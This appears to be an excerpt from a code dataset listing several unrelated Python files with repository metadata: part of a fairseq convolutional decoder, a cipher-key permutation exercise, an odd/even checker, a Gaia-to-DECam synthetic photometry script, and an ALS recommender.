if attention[i] else None)
self.residuals.append(residual)
in_channels = out_channels
layer_in_channels.append(out_channels)
self.adaptive_softmax = None
self.fc2 = self.fc3 = None
if adaptive_softmax_cutoff is not None:
assert not share_embed
self.adaptive_softmax = AdaptiveSoftmax(num_embeddings, in_channels, adaptive_softmax_cutoff,
dropout=adaptive_softmax_dropout)
else:
self.fc2 = Linear(in_channels, out_embed_dim)
if share_embed:
assert out_embed_dim == embed_dim, \
"Shared embed weights implies same dimensions " \
" out_embed_dim={} vs embed_dim={}".format(out_embed_dim, embed_dim)
self.fc3 = nn.Linear(out_embed_dim, num_embeddings)
self.fc3.weight = self.embed_tokens.weight
else:
self.fc3 = Linear(out_embed_dim, num_embeddings, dropout=dropout)
def forward(self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused):
if encoder_out is not None:
encoder_padding_mask = encoder_out['encoder_padding_mask']
encoder_out = encoder_out['encoder_out']
# split and transpose encoder outputs
encoder_a, encoder_b = self._split_encoder_out(encoder_out, incremental_state)
if self.embed_positions is not None:
pos_embed = self.embed_positions(prev_output_tokens, incremental_state)
else:
pos_embed = 0
if incremental_state is not None:
prev_output_tokens = prev_output_tokens[:, -1:]
x = self._embed_tokens(prev_output_tokens, incremental_state)
# embed tokens and combine with positional embeddings
x += pos_embed
x = F.dropout(x, p=self.dropout, training=self.training)
target_embedding = x
# project to size of convolution
x = self.fc1(x)
# B x T x C -> T x B x C
x = self._transpose_if_training(x, incremental_state)
# temporal convolutions
avg_attn_scores = None
num_attn_layers = len(self.attention)
residuals = [x]
for proj, conv, attention, res_layer in zip(self.projections, self.convolutions, self.attention,
self.residuals):
if res_layer > 0:
residual = residuals[-res_layer]
residual = residual if proj is None else proj(residual)
else:
residual = None
x = F.dropout(x, p=self.dropout, training=self.training)
x = conv(x, incremental_state)
x = F.glu(x, dim=2)
# attention
if attention is not None:
x = self._transpose_if_training(x, incremental_state)
x, attn_scores = attention(x, target_embedding, (encoder_a, encoder_b), encoder_padding_mask)
if not self.training and self.need_attn:
attn_scores = attn_scores / num_attn_layers
if avg_attn_scores is None:
avg_attn_scores = attn_scores
else:
avg_attn_scores.add_(attn_scores)
x = self._transpose_if_training(x, incremental_state)
# residual
if residual is not None:
x = (x + residual) * math.sqrt(0.5)
residuals.append(x)
# T x B x C -> B x T x C
x = self._transpose_if_training(x, incremental_state)
# project back to size of vocabulary if not using adaptive softmax
if self.fc2 is not None and self.fc3 is not None:
x = self.fc2(x)
x = F.dropout(x, p=self.dropout, training=self.training)
x = self.fc3(x)
return x, avg_attn_scores
def reorder_incremental_state(self, incremental_state, new_order):
super().reorder_incremental_state(incremental_state, new_order)
encoder_out = utils.get_incremental_state(self, incremental_state, 'encoder_out')
if encoder_out is not None:
encoder_out = tuple(eo.index_select(0, new_order) for eo in encoder_out)
utils.set_incremental_state(self, incremental_state, 'encoder_out', encoder_out)
def max_positions(self):
"""Maximum output length supported by the decoder."""
return self.embed_positions.max_positions() if self.embed_positions is not None else float('inf')
def upgrade_state_dict(self, state_dict):
if utils.item(state_dict.get('decoder.version', torch.Tensor([1]))[0]) < 2:
# old models use incorrect weight norm dimension
for i, conv in enumerate(self.convolutions):
# reconfigure weight norm
nn.utils.remove_weight_norm(conv)
self.convolutions[i] = nn.utils.weight_norm(conv, dim=0)
state_dict['decoder.version'] = torch.Tensor([1])
return state_dict
def make_generation_fast_(self, need_attn=False, **kwargs):
self.need_attn = need_attn
def _embed_tokens(self, tokens, incremental_state):
if incremental_state is not None:
# keep only the last token for incremental forward pass
tokens = tokens[:, -1:]
return self.embed_tokens(tokens)
def _split_encoder_out(self, encoder_out, incremental_state):
"""Split and transpose encoder outputs.
This is cached when doing incremental inference.
"""
cached_result = utils.get_incremental_state(self, incremental_state, 'encoder_out')
if cached_result is not None:
return cached_result
# transpose only once to speed up attention layers
encoder_a, encoder_b = encoder_out
encoder_a = encoder_a.transpose(1, 2).contiguous()
result = (encoder_a, encoder_b)
if incremental_state is not None:
utils.set_incremental_state(self, incremental_state, 'encoder_out', result)
return result
def _transpose_if_training(self, x, incremental_state):
if incremental_state is None:
x = x.transpose(0, 1)
return x
def extend_conv_spec(convolutions):
"""
Extends convolutional spec that is a list of tuples of 2 or 3 parameters
(kernel size, dim size and optionally how many layers behind to look for residual)
to default the residual propagation param if it is not specified
"""
extended = []
for spec in convolutions:
if len(spec) == 3:
extended.append(spec)
elif len(spec) == 2:
extended.append(spec + (1,))
else:
raise Exception('invalid number of parameters in convolution spec ' + str(spec) + '. expected 2 or 3')
return tuple(extended)
def Embedding(num_embeddings, embedding_dim, padding_idx):
m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
nn.init.normal_(m.weight, 0, 0.1)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def PositionalEmbedding(num_embeddings, embedding_dim, padding_idx):
m = LearnedPositionalEmbedding(num_embeddings, embedding_dim, padding_idx)
nn.init.normal_(m.weight, 0, 0.1)
nn.init.constant_(m.weight[padding_idx], 0)
return m
def Linear(in_features, out_features, dropout=0):
"""Weight-normalized Linear layer (input: N x T x C)"""
m = nn.Linear(in_features, out_features)
nn.init.normal_(m.weight, mean=0, std=math.sqrt((1 - dropout) / in_features))
nn.init.constant_(m.bias, 0)
return nn.utils.weight_norm(m)
def LinearizedConv1d(in_channels, out_channels, kernel_size, dropout=0, **kwargs):
"""Weight-normalized Conv1d layer optimized for decoding"""
m = LinearizedConvolution(in_channels, out_channels, kernel_size, **kwargs)
std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))
nn.init.normal_(m.weight, mean=0, std=std)
nn.init.constant_(m.bias, 0)
return nn.utils.weight_norm(m, dim=2)
def ConvTBC(in_channels, out_channels, kernel_size, dropout=0, **kwargs):
"""Weight-normalized Conv1d layer"""
from fairseq.modules import ConvTBC
m = ConvTBC(in_channels, out_channels, kernel_size, **kwargs)
std = math.sqrt((4 * (1.0 - dropout)) / (m.kernel_size[0] * in_channels))
nn.init.normal_(m.weight, mean=0, std=std)
nn.init.constant_(m.bias, 0)
return nn.utils.weight_norm(m, dim=2)
@register_model_architecture('fconv', 'fconv')
def base_architecture(args):
args.dropout = getattr(args, 'dropout', 0.1)
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 512)
args.encoder_embed_path = getattr(args, 'encoder_embed_path', None)
args.encoder_layers = getattr(args, 'encoder_layers', '[(512, 3)] * 20')
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 512)
args.decoder_embed_path = getattr(args, 'decoder_embed_path', None)
args.decoder_layers = getattr(args, 'decoder_layers', '[(512, 3)] * 20')
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 256)
args.decoder_attention = getattr(args, 'decoder_attention', 'True')
args.share_input_output_embed = getattr(args, 'share_input_output_embed', False)
@register_model_architecture('fconv', 'fconv_iwslt_de_en')
def fconv_iwslt_de_en(args):
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 256)
args.encoder_layers = getattr(args, 'encoder_layers', '[(256, 3)] * 4')
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 256)
args.decoder_layers = getattr(args, 'decoder_layers', '[(256, 3)] * 3')
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 256)
base_architecture(args)
@register_model_architecture('fconv', 'fconv_wmt_en_ro')
def fconv_wmt_en_ro(args):
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 512)
base_architecture(args)
@register_model_architecture('fconv', 'fconv_wmt_en_de')
def fconv_wmt_en_de(args):
convs = '[(512, 3)] * 9' # first 9 layers have 512 units
convs += ' + [(1024, 3)] * 4' # next 4 layers have 1024 units
convs += ' + [(2048, 1)] * 2' # final 2 layers use 1x1 convolutions
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 768)
args.encoder_layers = getattr(args, 'encoder_layers', convs)
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 768)
args.decoder_layers = getattr(args, 'decoder_layers', convs)
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 512)
base_architecture(args)
@register_model_architecture('fconv', 'fconv_wmt_en_fr')
def fconv_wmt_en_fr(args):
convs = '[(512, 3)] * 6' # first 6 layers have 512 units
convs += ' + [(768, 3)] * 4' # next 4 layers have 768 units
convs += ' + [(1024, 3)] * 3' # next 3 layers have 1024 units
convs += ' + [(2048, 1)] * 1' # next 1 layer uses 1x1 convolutions
convs += ' + [(4096, 1)] * 1' # final 1 layer uses 1x1 convolutions
args.encoder_embed_dim = getattr(args, 'encoder_embed_dim', 768)
args.encoder_layers = getattr(args, 'encoder_layers', convs)
args.decoder_embed_dim = getattr(args, 'decoder_embed_dim', 768)
args.decoder_layers = getattr(args, 'decoder_layers', convs)
args.decoder_out_embed_dim = getattr(args, 'decoder_out_embed_dim', 512)
base_architecture(args)
| [
"[email protected]"
] | |
76950567499f25a761480d17cfaa528a71dd1eda | 522f4b1b18416443062ec53157340fb2d6f43b1b | /ch4/automate_possible_keys.py | 028d5a70faf14dc5253f9c385bc41c6c444e2c5d | [] | no_license | thewchan/impractical_python | fd3f3d82c6f45d1fd0dea55611bc8d5369c8982c | 9963df374b7de5b3eb1faa58e45de7857c3fc792 | refs/heads/master | 2021-05-22T00:41:05.491349 | 2020-04-04T02:18:16 | 2020-04-04T02:18:16 | 252,884,952 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | """
Pseudo-code
ask for length of key
initiate possible integers
get sum of positive integers
get negative integers
merge into 1 string
get permutation
loop through permutation and sum up abs values
eliminate those with sum not equal to sum of positive integers
print out list of tuples
"""
from itertools import permutations
while True:
key_len = input("Enter length of key: ")
try:
key_len = int(key_len)
except ValueError:
print("Please enter a number.")
continue
break
positive_integers = list(range(key_len + 1))
positive_integers.pop(0)
print(
"Possible key values (not including direction): ",
*positive_integers,
)
negative_integers = [-1 * x for x in positive_integers]
all_integers = positive_integers + negative_integers
raw_perms = list(permutations(all_integers, key_len))
filtered_perms = []
for perm in raw_perms:
abs_perm = [abs(x) for x in perm]
set_perm = set(abs_perm)
if len(set_perm) == len(perm):
filtered_perms.append(perm)
print("Valid key combinations:\n", *filtered_perms, sep='\n')
print(f"Number of valid key combinations: {len(filtered_perms)}")
| [
"[email protected]"
] | |
a5846c31c6b2366554d3e964fe1fab8ed55f1bb7 | f228b0cbe141d23ad918f9fe7a40674ca8d7c963 | /First_project.py | c59b3f5d3eea312d6cae46c1d93c796c070a73e0 | [] | no_license | Vazimax/My_first_project | a990996e753a979f8bc0393ce97837be55e84418 | 36b8c61a9e05ed9b35b5364521f79c906036415d | refs/heads/main | 2023-01-23T06:04:43.082815 | 2020-11-24T18:47:02 | 2020-11-24T18:47:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | def odd_even_project() :
number = input("Enter a number :")
while number != "x":
try:
number = int(number)
if number%2 == 0 :
print("It's an even number =)")
else :
print("It's an odd number :)")
except ValueError:
print("Please Enter a valid number")
number = input("Enter a number again , and if you wanna exit press 'x' :") | [
"[email protected]"
] | |
416028c8780dd01160c0b6dd3d29eb7302eda7ca | 3b5ee9aa584bfca56dabc19d75717f6104c0dc95 | /gaia/compute_synthetic_decam_fluxes.py | c4888f1d885e08e3fbaada340ff8434fa33f40ce | [] | no_license | rongpu/desi-misc | 95690ca99962940fd4a793d523edf4d2ce68b4c3 | c700344ebf8f74391fcce69a47e4ca57fc4b34f8 | refs/heads/master | 2023-09-01T00:49:07.399914 | 2023-08-11T17:10:40 | 2023-08-11T17:10:40 | 173,173,912 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,939 | py | # Convert the files from .csv.gz to .fits
from __future__ import division, print_function
import sys, os, glob, time, warnings, gc
import numpy as np
import matplotlib.pyplot as plt
from astropy.table import Table, vstack, hstack, join
import fitsio
from multiprocessing import Pool
from gaiaxpy import generate, PhotometricSystem
output_dir = '/global/cfs/cdirs/desi/users/rongpu/data/gaia_dr3/xp_synthetic_decam_photometry'
fns = sorted(glob.glob('/pscratch/sd/r/rongpu/gaia_dr3/xp_continuous_mean_spectrum/XpContinuousMeanSpectrum_*.fits'))
print(len(fns))
def do_something(fn):
output_fn = os.path.join(output_dir, os.path.basename(fn).replace('XpContinuousMeanSpectrum_', 'XpSyntheticDECam_'))
if os.path.isfile(output_fn):
print(output_fn, 'already exists!')
return None
cat = Table(fitsio.read(fn))
# Workaround to make the multidimensional arrays pandas-compatible
cat = vstack([cat, cat[:1].copy()])
for col in ['bp_coefficients', 'bp_coefficient_errors', 'bp_coefficient_correlations', 'rp_coefficients', 'rp_coefficient_errors', 'rp_coefficient_correlations']:
tmp = list(np.array(cat[col]))
tmp.pop()
tmp += [np.array([0])]
cat[col] = tmp
cat = cat[:-1]
print(len(cat))
cat = cat.to_pandas()
phot_system = PhotometricSystem.DECam
photom = generate(cat, photometric_system=phot_system, save_file=False)
photom = Table.from_pandas(photom)
print(np.allclose(photom['Decam_mag_g'], (-2.5*np.log10(photom['Decam_flux_g']))-56.1),
np.allclose(photom['Decam_mag_r'], (-2.5*np.log10(photom['Decam_flux_r']))-56.1),
np.allclose(photom['Decam_mag_i'], (-2.5*np.log10(photom['Decam_flux_i']))-56.1),
np.allclose(photom['Decam_mag_z'], (-2.5*np.log10(photom['Decam_flux_z']))-56.1),
np.allclose(photom['Decam_mag_Y'], (-2.5*np.log10(photom['Decam_flux_Y']))-56.1))
for col in ['Decam_flux_g', 'Decam_flux_r', 'Decam_flux_i', 'Decam_flux_z', 'Decam_flux_Y', 'Decam_flux_error_g', 'Decam_flux_error_r', 'Decam_flux_error_i', 'Decam_flux_error_z', 'Decam_flux_error_Y']:
photom[col.replace('Decam_', '')] = photom[col] * 10**31.44
print(np.allclose(photom['Decam_mag_g'], (22.5-2.5*np.log10(photom['flux_g']))),
np.allclose(photom['Decam_mag_r'], (22.5-2.5*np.log10(photom['flux_r']))),
np.allclose(photom['Decam_mag_i'], (22.5-2.5*np.log10(photom['flux_i']))),
np.allclose(photom['Decam_mag_z'], (22.5-2.5*np.log10(photom['flux_z']))),
np.allclose(photom['Decam_mag_Y'], (22.5-2.5*np.log10(photom['flux_Y']))))
photom = photom[['source_id', 'flux_g', 'flux_r', 'flux_i', 'flux_z', 'flux_Y', 'flux_error_g', 'flux_error_r', 'flux_error_i', 'flux_error_z', 'flux_error_Y']]
photom.write(output_fn)
return None
n_process = 16
with Pool(processes=n_process) as pool:
res = pool.map(do_something, fns, chunksize=1)
| [
"[email protected]"
] | |
76c636adc6a52dcef38e9fc2977e6afa5a920185 | a0de3a09c857fab7281e4ca4a70a256a4a3575cb | /als.py | b35a28e27cad3706c3bcf527164858c394b50fad | [] | no_license | poker-HuDL/machine-learning | 16fcda0ef7221f6d534b1fa929550894bc775c8a | 8cfae1e944faa67244f18d03d10ca7dd7323be19 | refs/heads/master | 2022-02-27T01:03:19.122602 | 2019-11-07T09:56:16 | 2019-11-07T09:56:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,658 | py | #coding=utf-8
from collections import defaultdict
from random import random
from itertools import product, chain
from time import time
def load_movie_ratings():
f = open("boston/movie_ratings.csv")
lines = iter(f)
col_names = ", ".join(next(lines)[:-1].split(",")[:-1])
print("The column names are: %s." % col_names)
data = [[float(x) if i == 2 else int(x)
for i, x in enumerate(line[:-1].split(",")[:-1])]
for line in lines]
f.close()
return data
class Matrix(object):
def __init__(self, data):
self.data = data
self.shape = (len(data), len(data[0]))
def row(self, row_no):
return Matrix([self.data[row_no]])
def col(self, col_no):
m = self.shape[0]
return Matrix([[self.data[i][col_no]] for i in range(m)])
@property
def is_square(self):
return self.shape[0] == self.shape[1]
@property
def transpose(self):
data = list(map(list, zip(*self.data)))
return Matrix(data)
# 生成一个长度为n的单位阵
def _eye(self, n):
return [[0 if i != j else 1 for j in range(n)] for i in range(n)]
@property
def eye(self):
assert self.is_squre, "The matrix has to be squre"
data = self._eye(self.shape[0])
return Matrix(data)
# 高斯消元
def gaussian_elimination(self, aug_matrix):
n = len(aug_matrix)
m = len(aug_matrix[0])
# From top to bottom.
for col_idx in range(n):
# Check if element on the diagonal is zero.
if aug_matrix[col_idx][col_idx] == 0:
row_idx = col_idx
# Find a row whose element has same column index with
# the element on the diagonal is not zero.
while row_idx < n and aug_matrix[row_idx][col_idx] == 0:
row_idx += 1
# Add this row to the row of the element on the diagonal.
for i in range(col_idx, m):
aug_matrix[col_idx][i] += aug_matrix[row_idx][i]
# Elimiate the non-zero element.
for i in range(col_idx + 1, n):
# Skip the zero element.
if aug_matrix[i][col_idx] == 0:
continue
# Elimiate the non-zero element.
k = aug_matrix[i][col_idx] / aug_matrix[col_idx][col_idx]
for j in range(col_idx, m):
aug_matrix[i][j] -= k * aug_matrix[col_idx][j]
# From bottom to top.
for col_idx in range(n - 1, -1, -1):
# Elimiate the non-zero element.
for i in range(col_idx):
# Skip the zero element.
if aug_matrix[i][col_idx] == 0:
continue
# Elimiate the non-zero element.
k = aug_matrix[i][col_idx] / aug_matrix[col_idx][col_idx]
for j in chain(range(i, col_idx + 1), range(n, m)):
aug_matrix[i][j] -= k * aug_matrix[col_idx][j]
# Iterate the element on the diagonal.
for i in range(n):
k = 1 / aug_matrix[i][i]
aug_matrix[i][i] *= k
for j in range(n, m):
aug_matrix[i][j] *= k
return aug_matrix
# 矩阵求逆
def _inverse(self, data):
n = len(data)
unit_matrix = self._eye(n)
aug_matrix = [a + b for a, b in zip(self.data, unit_matrix)]
ret = self.gaussian_elimination(aug_matrix)
return list(map(lambda x: x[n:], ret))
# 矩阵求逆,原理:https://baike.baidu.com/item/%E9%AB%98%E6%96%AF%E6%B6%88%E5%85%83%E6%B3%95/619561?fr=aladdin
@property
def inverse(self):
assert self.is_square, "The matrix has to be square!"
data = self._inverse(self.data)
return Matrix(data)
def row_mul(self, row_A, row_B):
return sum(x[0] * x[1] for x in zip(row_A, row_B))
def _mat_mul(self, row_A, B):
row_pairs = product([row_A], B.transpose.data)
return [self.row_mul(*row_pair) for row_pair in row_pairs]
def mat_mul(self, B):
assert self.shape[1] == B.shape[0], "A's column count does not match B's row count!"
return Matrix([self._mat_mul(row_A, B) for row_A in self.data])
def _mean(self, data):
m = len(data)
n = len(data[0])
ret = [0 for _ in range(n)]
for row in data:
for j in range(n):
ret[j] += row[j] / m
return ret
def mean(self, data):
return Matrix(self._mean(self.data))
# 统计程序运行时间函数
# fn代表运行的函数
def run_time(fn):
def fun():
start = time()
fn()
ret = time() - start
if ret < 1e-6:
unit = "ns"
ret *= 1e9
elif ret < 1e-3:
unit = "us"
ret *= 1e6
elif ret < 1:
unit = "ms"
ret *= 1e3
else:
unit = "s"
print("Total run time is %.1f %s\n" % (ret, unit))
return fun()
class ALS(object):
# 初始化,存储用户ID、物品ID、用户ID与用户矩阵列号的对应关系、物品ID
# 与物品矩阵列号的对应关系、用户已经看过哪些物品、评分矩阵的Shape以及RMSE
def __init__(self):
self.user_ids = None
self.item_ids = None
self.user_ids_dict = None
self.item_ids_dict = None
self.user_matrix = None
self.item_matrix = None
self.user_items = None
self.shape = None
self.rmse = None
# 对训练数据进行处理,得到用户ID、物品ID、用户ID与用户矩阵列号的对应关系、物
# 品ID与物品矩阵列号的对应关系、评分矩阵的Shape、评分矩阵及评分矩阵的转置。
def process_data(self, X):
self.user_ids = tuple((set(map(lambda x: x[0], X))))
self.user_ids_dict = dict(map(lambda x: x[::-1], enumerate(self.user_ids)))
self.item_ids = tuple((set(map(lambda x: x[1], X))))
self.item_ids_dict = dict(map(lambda x: x[::-1], enumerate(self.item_ids)))
self.shape = (len(self.user_ids), len(self.item_ids))
ratings = defaultdict(lambda : defaultdict(int))
ratings_T = defaultdict(lambda : defaultdict(int))
for row in X:
user_id, item_id, rating = row
ratings[user_id][item_id] = rating
ratings_T[item_id][user_id] = rating
err_msg = "Length of user_ids %d and ratings %d not match!" % (
len(self.user_ids), len(ratings))
assert len(self.user_ids) == len(ratings), err_msg
err_msg = "Length of item_ids %d and ratings_T %d not match!" % (
len(self.item_ids), len(ratings_T))
assert len(self.item_ids) == len(ratings_T), err_msg
return ratings, ratings_T
# 用户矩阵乘以评分矩阵,实现稠密矩阵与稀疏矩阵的矩阵乘法,得到用户矩阵与评分矩阵的乘积。
def users_mul_ratings(self, users, ratings_T):
def f(users_row, item_id):
user_ids = iter(ratings_T[item_id].keys())
scores = iter(ratings_T[item_id].values())
col_nos = map(lambda x: self.user_ids_dict[x], user_ids)
_users_row = map(lambda x: users_row[x], col_nos)
return sum(a * b for a, b in zip(_users_row, scores))
ret = [[f(users_row, item_id) for item_id in self.item_ids]
for users_row in users.data]
return Matrix(ret)
# 物品矩阵乘以评分矩阵,实现稠密矩阵与稀疏矩阵的矩阵乘法,得到物品矩阵与评分矩阵的乘积。
def items_mul_ratings(self, items, ratings):
def f(items_row, user_id):
item_ids = iter(ratings[user_id].keys())
scores = iter(ratings[user_id].values())
col_nos = map(lambda x: self.item_ids_dict[x], item_ids)
_items_row = map(lambda x: items_row[x], col_nos)
return sum(a * b for a, b in zip(_items_row, scores))
ret = [[f(items_row, user_id) for user_id in self.user_ids]
for items_row in items.data]
return Matrix(ret)
# 生成随机矩阵
def gen_random_matrix(self, n_rows, n_colums):
data = [[random() for _ in range(n_colums)] for _ in range(n_rows)]
return Matrix(data)
# 计算RMSE
def get_rmse(self, ratings):
m, n = self.shape
mse = 0.0
n_elements = sum(map(len, ratings.values()))
for i in range(m):
for j in range(n):
user_id = self.user_ids[i]
item_id = self.item_ids[j]
rating = ratings[user_id][item_id]
if rating > 0:
user_row = self.user_matrix.col(i).transpose
item_col = self.item_matrix.col(j)
rating_hat = user_row.mat_mul(item_col).data[0][0]
square_error = (rating - rating_hat) ** 2
mse += square_error / n_elements
return mse ** 0.5
# 训练模型
# 1.数据预处理
# 2.变量k合法性检查
# 3.生成随机矩阵U
# 4.交替计算矩阵U和矩阵I,并打印RMSE信息,直到迭代次数达到max_iter
# 5.保存最终的RMSE
def fit(self, X, k, max_iter=10):
ratings, ratings_T = self.process_data(X)
self.user_items = {k: set(v.keys()) for k,v in ratings.items()}
m, n = self.shape
error_msg = "Parameter k must be less than the rank of original matrix"
assert k < min(m, n), error_msg
self.user_matrix = self.gen_random_matrix(k, m)
for i in range(max_iter):
if i % 2:
items = self.item_matrix
self.user_matrix = self.items_mul_ratings(
items.mat_mul(items.transpose).inverse.mat_mul(items),
ratings
)
else:
users = self.user_matrix
self.item_matrix = self.users_mul_ratings(
users.mat_mul(users.transpose).inverse.mat_mul(users),
ratings_T
)
rmse = self.get_rmse(ratings)
print("Iterations: %d, RMSE: %.6f" % (i + 1, rmse))
self.rmse = rmse
# 预测一个用户
def _predict(self, user_id, n_items):
users_col = self.user_matrix.col(self.user_ids_dict[user_id])
users_col = users_col.transpose
items_col = enumerate(users_col.mat_mul(self.item_matrix).data[0])
items_scores = map(lambda x: (self.item_ids[x[0]], x[1]), items_col)
viewed_items = self.user_items[user_id]
items_scores = filter(lambda x: x[0] not in viewed_items, items_scores)
return sorted(items_scores, key=lambda x: x[1], reverse=True)[:n_items]
# 预测多个用户
def predict(self, user_ids, n_items=10):
return [self._predict(user_id, n_items) for user_id in user_ids]
def format_prediction(item_id, score):
return "item_id:%d score:%.2f" % (item_id, score)
@run_time
def main():
print("Tesing the accuracy of ALS...")
X = load_movie_ratings()
model = ALS()
model.fit(X, k=3, max_iter=5)
print("Showing the predictions of users...")
user_ids = range(1, 5)
predictions = model.predict(user_ids, n_items=2)
for user_id, prediction in zip(user_ids, predictions):
_prediction = [format_prediction(item_id, score)
for item_id, score in prediction]
print("User id:%d recommedation: %s" % (user_id, _prediction))
| [
"[email protected]"
] | |
167e0aa64ce2767420af626e5aa6e2b676c439ca | 7c74e87d80ef98f9758eda322a00209e7cb493ae | /leader/src/main/market/utils/QuitContainer.py | 4aa38f2d1b09ec560235078f356e2f230a209832 | [] | no_license | rorymcstay/car | f95e8623b34e1f36078b1aa789d46d6fc0897c36 | b1640253d06b165b999af47b889a07b865b9809e | refs/heads/master | 2020-05-07T16:03:40.158430 | 2019-09-15T13:15:49 | 2019-09-15T13:15:49 | 180,664,010 | 1 | 0 | null | 2019-04-23T23:24:42 | 2019-04-10T21:07:06 | Python | UTF-8 | Python | false | false | 92 | py | """
Contains methods for cleaning up containers
"""
def quit_container(container):
pass | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.